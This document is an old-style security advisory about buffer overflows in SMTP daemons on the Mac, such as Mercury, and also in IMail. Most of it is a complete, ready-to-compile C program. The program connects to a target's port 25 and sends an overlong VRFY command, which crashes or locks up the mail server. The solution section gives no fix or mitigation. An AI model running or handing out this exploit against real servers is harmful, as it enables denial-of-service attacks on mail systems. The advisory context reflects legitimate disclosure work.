COMMAND

    smtp overflows

SYSTEMS AFFECTED

    Mac

PROBLEM

    Jon Beaton posted following.  There has been more advisories about
    the  buffer  overflows  on  smtp  daemons,  so here's another one.
    After posting about these attacks  on SLMail and Imail, Jon  found
    that there were alot  more that were still  affected.  On the  few
    he tried on the  Mac, like Mercury, it  had locked the server  up,
    much like Appleshare.  Anyways,  this is just mdaemon.c with  just
    a few tiny changes.  This  will also crash IMail, even though  the
    author has said it wasn't affected.

    /*
    mdaemon.c with a few small changes.
    known to lock up the whole server with some daemons on the Mac
  
    Cisc0 @ Undernet
    */

    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>

     void main(int argc, char *argv[])
     {
       struct sockaddr_in sin;
       struct hostent *hp;
       char *buffer;
       int sock, i;

       if (argc != 2) {
         printf("usage: %s <smtp server>\n", argv[0]);
         exit(1);
       }
       hp = gethostbyname(argv[1]);
       if (hp==NULL) {
         printf("Unknown host: %s\n",argv[1]);
         exit(1);
       }
       bzero((char*) &sin, sizeof(sin));
       bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
       sin.sin_family = hp->h_addrtype;
       sin.sin_port = htons(25);
       sock = socket(AF_INET, SOCK_STREAM, 0);
       connect(sock,(struct sockaddr *) &sin, sizeof(sin));
       buffer = (char *)malloc(1000);
       sprintf(buffer, "VRFY ");
       for (i = 0; i<896; i++)
         strcat(buffer, "d");
       strcat(buffer, "\r\n");
       write(sock, &buffer[0], strlen(buffer));
       close(sock);
       free(buffer);
    }

SOLUTION

    Next releases will hopefully fix this.